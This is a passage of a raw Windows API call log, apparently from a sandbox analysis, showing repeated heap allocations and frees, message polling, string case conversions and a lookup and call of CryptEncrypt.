(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.161] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0201.161] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.161] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.161] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0201.161] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0201.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0201.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.161] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0201.162] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.162] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0201.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0201.162] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.163] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0201.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0201.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0201.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0201.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0201.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0201.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0201.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0201.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x24a9ca8 [0201.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9ca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0201.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.167] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0201.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6bc0 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0201.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0201.168] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0201.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0201.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0201.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0201.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0201.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0201.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0201.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0201.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree 